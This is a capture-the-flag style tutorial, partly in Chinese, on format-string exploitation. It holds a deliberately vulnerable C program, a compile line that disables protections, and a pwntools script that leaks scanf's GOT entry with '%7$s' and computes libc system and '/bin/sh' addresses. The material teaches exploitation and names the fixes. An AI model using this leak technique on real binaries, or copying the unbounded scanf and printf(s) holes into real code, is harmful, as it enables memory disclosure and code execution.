#include <stdio.h>
/* Deliberately vulnerable demo target for the format-string write-up below.
 * Two defects are the whole point of the exercise:
 *   - scanf("%s", s) has no width limit, so input longer than 99 bytes
 *     overflows s (fix: scanf("%99s", s));
 *   - printf(s) passes user input as the format string, so conversions in
 *     the input read (and can write) process memory
 *     (fix: printf("%s", s)); gcc -Wformat-security warns on this pattern.
 * The compile line on this page also disables the stack protector and PIE,
 * which is why the GOT address used by the script below is fixed.
 */
int main() {
char s[100];
scanf("%s", s);   /* unbounded read into a 100-byte buffer */
printf(s);        /* user input used directly as the format string */
return 0;
}
编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c
泄露的payload先贴出来,再理解
# coding:utf-8
from pwn import*
from LibcSearcher import *
context.log_level = 'debug'
# Spawn the locally compiled demo binary (see the gcc line above) and load
# its symbols. The GOT lookup below relies on a non-PIE binary (the
# "-no-pie" flag in that gcc line), so the address is fixed across runs.
sh = process('./fmt')
elf = ELF('./fmt')
scanf_got_addr = elf.got['__isoc99_scanf']
print(hex(scanf_got_addr))
# Input for the uncontrolled printf(s): the GOT entry address followed by a
# "%7$s" conversion. NOTE: str concatenation with p32() output and the bare
# "print hex(...)" statement further down mean this is Python 2 code.
payload = p32(scanf_got_addr) + '%7$s'
# pause()
sh.sendline(payload)
# Leak the real scanf address: the first 4 bytes echoed back are the GOT
# address itself (printed verbatim), bytes 4..8 are what "%7$s" read there.
scanf_addr = u32(sh.recv()[4:8])
print hex(scanf_addr)
# libc resolution from the leaked address
libc = LibcSearcher('__isoc99_scanf', scanf_addr)
libc_base = scanf_addr - libc.dump('__isoc99_scanf')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
# system_addr and binsh_addr are computed but never used in this script.
sh.interactive()
gdb断点在printf
理解一下:字符串偏移为7,所以payload为got偏移+%7$s;这边用 's' 而不是 'p',在于got表记录的内容也是个指针,%s直接解引用,返回内容为:got表偏移+真实地址,所以取 u32(sh.recv()[4:8])